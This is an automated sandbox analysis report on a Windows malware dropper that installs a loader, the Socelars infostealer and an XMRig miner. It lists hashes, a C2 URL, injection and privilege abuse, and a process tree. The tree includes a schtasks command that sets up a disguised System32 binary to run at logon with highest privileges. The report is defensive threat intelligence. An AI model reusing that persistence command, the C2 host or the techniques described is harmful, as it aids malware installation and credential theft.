onlylogger | 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c

Analysis

max time kernel
128s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2022 05:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe
Size

4.4MB
MD5

26150f2eaabfa57ee2c672a111fd8aa4
SHA1

bf4c2a6b9ccd3ce8d34f505efbae40287e0b671b
SHA256

562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c
SHA512

a7a1aa2c4df6d708b5449d6aa7a11a7a594fcefa31006f029e1a2432552ee8de47328313071710a4828c4e1d45821dcbefb9a03d35f796ee9ef6941101418665

Score

10^/10

onlylogger socelars xmrig loader miner spyware stealer

Malware Config

Extracted

Family

socelars

http://www.tpyyf.com/

Signatures

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3736 1652 rundll32.exe
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3736	1652	rundll32.exe

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\askinstall63.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\askinstall63.exe	family_socelars

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

OnlyLogger payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4568-201-0x0000000000400000-0x0000000000485000-memory.dmp	family_onlylogger
behavioral2/memory/4568-197-0x00000000006C0000-0x0000000000703000-memory.dmp	family_onlylogger

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5240-395-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5476-405-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5476-411-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5024-403-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5388-404-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5240-402-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5240-399-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5388-401-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/5024-400-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 49 IoCs

Processes:

LightCleaner2352312.exemali.exeinst1.exesetup.exeaskinstall63.exeRoutes Installation.exesearch_hyperfs_213.exemali.exeanytime1.exeanytime2.exeanytime3.exeanytime4.exeanytime5.exeanytime6.exeanytime7.exeanytime8.exebearvpn3.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exeChrome6.exeChrome6.exeChrome6.exeChrome6.exeChrome6.exeChrome6.exebearvpn3.exebearvpn3.exebearvpn3.exebearvpn3.exeChrome6.exeChrome6.exeChrome6.exeRoutes License Agreement.exeservices64.exeservices64.exeservices64.exeservices64.exeservices64.exesihost64.exesihost64.exesihost64.exesihost64.exe

pid	process
612	LightCleaner2352312.exe
1644	mali.exe
2084	inst1.exe
4568	setup.exe
4332	askinstall63.exe
3316	Routes Installation.exe
2104	search_hyperfs_213.exe
1340	mali.exe
5028	anytime1.exe
1104	anytime2.exe
1648	anytime3.exe
3456	anytime4.exe
4216	anytime5.exe
4976	anytime6.exe
732	anytime7.exe
4848	anytime8.exe
4440	bearvpn3.exe
4068	LzmwAqmV.exe
3064	LzmwAqmV.exe
2424	LzmwAqmV.exe
4064	LzmwAqmV.exe
4924	LzmwAqmV.exe
4564	LzmwAqmV.exe
1644	LzmwAqmV.exe
1064	LzmwAqmV.exe
1032	LzmwAqmV.exe
1372	Chrome6.exe
500	Chrome6.exe
2304	Chrome6.exe
3028	Chrome6.exe
3436	Chrome6.exe
4084	Chrome6.exe
1428	bearvpn3.exe
1624	bearvpn3.exe
5032	bearvpn3.exe
208	bearvpn3.exe
3912	Chrome6.exe
4640	Chrome6.exe
2152	Chrome6.exe
4328	Routes License Agreement.exe
5512	services64.exe
5592	services64.exe
5688	services64.exe
4304	services64.exe
5812	services64.exe
4120	sihost64.exe
900	sihost64.exe
5340	sihost64.exe
5556	sihost64.exe

Checks computer location settings 2 TTPs 21 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LzmwAqmV.exeanytime2.exesearch_hyperfs_213.exeLzmwAqmV.exeLzmwAqmV.exeanytime6.exeLzmwAqmV.exeLzmwAqmV.exeLzmwAqmV.exemali.exeanytime4.exeanytime5.exeanytime8.exeLzmwAqmV.exeLzmwAqmV.exe562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exebearvpn3.exeanytime1.exeanytime3.exeanytime7.exeLzmwAqmV.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	search_hyperfs_213.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	mali.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	bearvpn3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	anytime7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe

Loads dropped DLL 13 IoCs

Processes:

Routes Installation.exerundll32.exerundll32.exeRoutes License Agreement.exerundll32.exe

pid	process
3316	Routes Installation.exe
3316	Routes Installation.exe
3316	Routes Installation.exe
3316	Routes Installation.exe
3316	Routes Installation.exe
3800	rundll32.exe
1044	rundll32.exe
1044	rundll32.exe
4328	Routes License Agreement.exe
4328	Routes License Agreement.exe
4328	Routes License Agreement.exe
4352	rundll32.exe
4352	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in System32 directory 19 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File opened for modification	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File opened for modification	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	pid	process	target process
PID 4668 set thread context of 5240	4668	conhost.exe	explorer.exe
PID 4816 set thread context of 5388	4816	conhost.exe	explorer.exe
PID 4732 set thread context of 5024	4732	conhost.exe	explorer.exe
PID 4212 set thread context of 5476	4212	conhost.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3696	4568	WerFault.exe	setup.exe
3472	1032	WerFault.exe
1288	4568	WerFault.exe	setup.exe
2040	4568	WerFault.exe	setup.exe
3924	1624	WerFault.exe
2260	208	WerFault.exe
2948	1428	WerFault.exe
4260	1644	WerFault.exe	mali.exe
4136	4564	WerFault.exe
5112	4568	WerFault.exe	setup.exe
1796	4568	WerFault.exe	setup.exe
5200	4568	WerFault.exe	setup.exe
3760	4568	WerFault.exe	setup.exe
5716	4568	WerFault.exe	setup.exe
720	4568	WerFault.exe	setup.exe
3896	4568	WerFault.exe	setup.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5352	schtasks.exe
5364	schtasks.exe
5320	schtasks.exe
5312	schtasks.exe
5304	schtasks.exe
5288	schtasks.exe
5296	schtasks.exe
5280	schtasks.exe
5368	schtasks.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4456 taskkill.exe
Modifies registry class 1 IoCs

Processes:

search_hyperfs_213.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings search_hyperfs_213.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4456	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings	search_hyperfs_213.exe

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4668	conhost.exe
4668	conhost.exe
4660	conhost.exe
4660	conhost.exe
4732	conhost.exe
4732	conhost.exe
2804	conhost.exe
2804	conhost.exe
4776	conhost.exe
4776	conhost.exe
3652	conhost.exe
3652	conhost.exe
4212	conhost.exe
4212	conhost.exe
4048	conhost.exe
4048	conhost.exe
4816	conhost.exe
4816	conhost.exe
3368	powershell.exe
3368	powershell.exe
3776	powershell.exe
208	powershell.exe
3776	powershell.exe
208	powershell.exe
4764	powershell.exe
4764	powershell.exe
3608	powershell.exe
3608	powershell.exe
456	powershell.exe
456	powershell.exe
3708	powershell.exe
3708	powershell.exe
3492	powershell.exe
3492	powershell.exe
3356	powershell.exe
3356	powershell.exe
3776	powershell.exe
3776	powershell.exe
3368	powershell.exe
3368	powershell.exe
3492	powershell.exe
3608	powershell.exe
3608	powershell.exe
208	powershell.exe
208	powershell.exe
456	powershell.exe
456	powershell.exe
3708	powershell.exe
3708	powershell.exe
4764	powershell.exe
4764	powershell.exe
3356	powershell.exe
3356	powershell.exe
5848	powershell.exe
5848	powershell.exe
5864	powershell.exe
5864	powershell.exe
5840	powershell.exe
5840	powershell.exe
5896	powershell.exe
5896	powershell.exe
5856	powershell.exe
5856	powershell.exe
5872	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

648

pid	process
648

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

askinstall63.exeanytime1.exeLightCleaner2352312.exeanytime2.exeanytime3.exeanytime4.exeanytime5.exeanytime6.exeanytime7.exeanytime8.exebearvpn3.exebearvpn3.exebearvpn3.exebearvpn3.exebearvpn3.exetaskkill.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeCreateTokenPrivilege	4332	askinstall63.exe
Token: SeAssignPrimaryTokenPrivilege	4332	askinstall63.exe
Token: SeLockMemoryPrivilege	4332	askinstall63.exe
Token: SeIncreaseQuotaPrivilege	4332	askinstall63.exe
Token: SeMachineAccountPrivilege	4332	askinstall63.exe
Token: SeTcbPrivilege	4332	askinstall63.exe
Token: SeSecurityPrivilege	4332	askinstall63.exe
Token: SeTakeOwnershipPrivilege	4332	askinstall63.exe
Token: SeLoadDriverPrivilege	4332	askinstall63.exe
Token: SeSystemProfilePrivilege	4332	askinstall63.exe
Token: SeSystemtimePrivilege	4332	askinstall63.exe
Token: SeProfSingleProcessPrivilege	4332	askinstall63.exe
Token: SeIncBasePriorityPrivilege	4332	askinstall63.exe
Token: SeCreatePagefilePrivilege	4332	askinstall63.exe
Token: SeCreatePermanentPrivilege	4332	askinstall63.exe
Token: SeBackupPrivilege	4332	askinstall63.exe
Token: SeRestorePrivilege	4332	askinstall63.exe
Token: SeShutdownPrivilege	4332	askinstall63.exe
Token: SeDebugPrivilege	4332	askinstall63.exe
Token: SeAuditPrivilege	4332	askinstall63.exe
Token: SeSystemEnvironmentPrivilege	4332	askinstall63.exe
Token: SeChangeNotifyPrivilege	4332	askinstall63.exe
Token: SeRemoteShutdownPrivilege	4332	askinstall63.exe
Token: SeUndockPrivilege	4332	askinstall63.exe
Token: SeSyncAgentPrivilege	4332	askinstall63.exe
Token: SeEnableDelegationPrivilege	4332	askinstall63.exe
Token: SeManageVolumePrivilege	4332	askinstall63.exe
Token: SeImpersonatePrivilege	4332	askinstall63.exe
Token: SeCreateGlobalPrivilege	4332	askinstall63.exe
Token: 31	4332	askinstall63.exe
Token: 32	4332	askinstall63.exe
Token: 33	4332	askinstall63.exe
Token: 34	4332	askinstall63.exe
Token: 35	4332	askinstall63.exe
Token: SeDebugPrivilege	5028	anytime1.exe
Token: SeDebugPrivilege	612	LightCleaner2352312.exe
Token: SeDebugPrivilege	1104	anytime2.exe
Token: SeDebugPrivilege	1648	anytime3.exe
Token: SeDebugPrivilege	3456	anytime4.exe
Token: SeDebugPrivilege	4216	anytime5.exe
Token: SeDebugPrivilege	4976	anytime6.exe
Token: SeDebugPrivilege	732	anytime7.exe
Token: SeDebugPrivilege	4848	anytime8.exe
Token: SeDebugPrivilege	4440	bearvpn3.exe
Token: SeDebugPrivilege	1428	bearvpn3.exe
Token: SeDebugPrivilege	1624	bearvpn3.exe
Token: SeDebugPrivilege	5032	bearvpn3.exe
Token: SeDebugPrivilege	208	bearvpn3.exe
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeDebugPrivilege	4668	conhost.exe
Token: SeDebugPrivilege	4660	conhost.exe
Token: SeDebugPrivilege	4732	conhost.exe
Token: SeDebugPrivilege	2804	conhost.exe
Token: SeDebugPrivilege	4776	conhost.exe
Token: SeDebugPrivilege	3652	conhost.exe
Token: SeDebugPrivilege	4212	conhost.exe
Token: SeDebugPrivilege	4048	conhost.exe
Token: SeDebugPrivilege	4816	conhost.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

mali.exemali.exe

pid process

1644 mali.exe
1644 mali.exe
1340 mali.exe
1340 mali.exe

pid	process
1644	mali.exe
1644	mali.exe
1340	mali.exe
1340	mali.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exemali.exeanytime3.exeanytime4.exeanytime1.exeanytime2.exeanytime7.exeanytime5.exebearvpn3.exesearch_hyperfs_213.exe

description	pid	process	target process
PID 1444 wrote to memory of 612	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	LightCleaner2352312.exe
PID 1444 wrote to memory of 612	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	LightCleaner2352312.exe
PID 1444 wrote to memory of 612	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	LightCleaner2352312.exe
PID 1444 wrote to memory of 1644	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	mali.exe
PID 1444 wrote to memory of 1644	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	mali.exe
PID 1444 wrote to memory of 1644	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	mali.exe
PID 1444 wrote to memory of 2084	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	inst1.exe
PID 1444 wrote to memory of 2084	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	inst1.exe
PID 1444 wrote to memory of 2084	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	inst1.exe
PID 1444 wrote to memory of 4568	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	setup.exe
PID 1444 wrote to memory of 4568	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	setup.exe
PID 1444 wrote to memory of 4568	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	setup.exe
PID 1444 wrote to memory of 4332	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	askinstall63.exe
PID 1444 wrote to memory of 4332	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	askinstall63.exe
PID 1444 wrote to memory of 4332	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	askinstall63.exe
PID 1444 wrote to memory of 3316	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	Routes Installation.exe
PID 1444 wrote to memory of 3316	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	Routes Installation.exe
PID 1444 wrote to memory of 3316	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	Routes Installation.exe
PID 1444 wrote to memory of 2104	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	search_hyperfs_213.exe
PID 1444 wrote to memory of 2104	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	search_hyperfs_213.exe
PID 1444 wrote to memory of 2104	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	search_hyperfs_213.exe
PID 1644 wrote to memory of 1340	1644	mali.exe	mali.exe
PID 1644 wrote to memory of 1340	1644	mali.exe	mali.exe
PID 1644 wrote to memory of 1340	1644	mali.exe	mali.exe
PID 1444 wrote to memory of 5028	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime1.exe
PID 1444 wrote to memory of 5028	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime1.exe
PID 1444 wrote to memory of 1104	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime2.exe
PID 1444 wrote to memory of 1104	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime2.exe
PID 1444 wrote to memory of 1648	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime3.exe
PID 1444 wrote to memory of 1648	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime3.exe
PID 1444 wrote to memory of 3456	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime4.exe
PID 1444 wrote to memory of 3456	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime4.exe
PID 1444 wrote to memory of 4216	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime5.exe
PID 1444 wrote to memory of 4216	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime5.exe
PID 1444 wrote to memory of 4976	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime6.exe
PID 1444 wrote to memory of 4976	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime6.exe
PID 1444 wrote to memory of 732	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime7.exe
PID 1444 wrote to memory of 732	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime7.exe
PID 1444 wrote to memory of 4848	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime8.exe
PID 1444 wrote to memory of 4848	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	anytime8.exe
PID 1444 wrote to memory of 4440	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	bearvpn3.exe
PID 1444 wrote to memory of 4440	1444	562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe	bearvpn3.exe
PID 1648 wrote to memory of 2424	1648	anytime3.exe	LzmwAqmV.exe
PID 1648 wrote to memory of 2424	1648	anytime3.exe	LzmwAqmV.exe
PID 1648 wrote to memory of 2424	1648	anytime3.exe	LzmwAqmV.exe
PID 3456 wrote to memory of 4064	3456	anytime4.exe	LzmwAqmV.exe
PID 3456 wrote to memory of 4064	3456	anytime4.exe	LzmwAqmV.exe
PID 3456 wrote to memory of 4064	3456	anytime4.exe	LzmwAqmV.exe
PID 5028 wrote to memory of 3064	5028	anytime1.exe	LzmwAqmV.exe
PID 5028 wrote to memory of 3064	5028	anytime1.exe	LzmwAqmV.exe
PID 5028 wrote to memory of 3064	5028	anytime1.exe	LzmwAqmV.exe
PID 1104 wrote to memory of 4068	1104	anytime2.exe	LzmwAqmV.exe
PID 1104 wrote to memory of 4068	1104	anytime2.exe	LzmwAqmV.exe
PID 1104 wrote to memory of 4068	1104	anytime2.exe	LzmwAqmV.exe
PID 732 wrote to memory of 4924	732	anytime7.exe	LzmwAqmV.exe
PID 732 wrote to memory of 4924	732	anytime7.exe	LzmwAqmV.exe
PID 732 wrote to memory of 4924	732	anytime7.exe	LzmwAqmV.exe
PID 4216 wrote to memory of 4564	4216	anytime5.exe	LzmwAqmV.exe
PID 4216 wrote to memory of 4564	4216	anytime5.exe	LzmwAqmV.exe
PID 4216 wrote to memory of 4564	4216	anytime5.exe	LzmwAqmV.exe
PID 4440 wrote to memory of 1644	4440	bearvpn3.exe	LzmwAqmV.exe
PID 4440 wrote to memory of 1644	4440	bearvpn3.exe	LzmwAqmV.exe
PID 4440 wrote to memory of 1644	4440	bearvpn3.exe	LzmwAqmV.exe
PID 2104 wrote to memory of 2412	2104	search_hyperfs_213.exe	control.exe

C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe
"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1444

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
"C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:612

C:\Users\Admin\AppData\Local\Temp\mali.exe
"C:\Users\Admin\AppData\Local\Temp\mali.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1644

C:\Users\Admin\AppData\Local\Temp\mali.exe
"C:\Users\Admin\AppData\Local\Temp\mali.exe" -a
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 1468
3⤵
- Program crash
PID:4260

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
3⤵
- Executes dropped EXE
PID:4640

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
4⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
PID:4424

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
- Creates scheduled task(s)
PID:5296

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
5⤵
- Executes dropped EXE
PID:4120

C:\Windows\explorer.exe
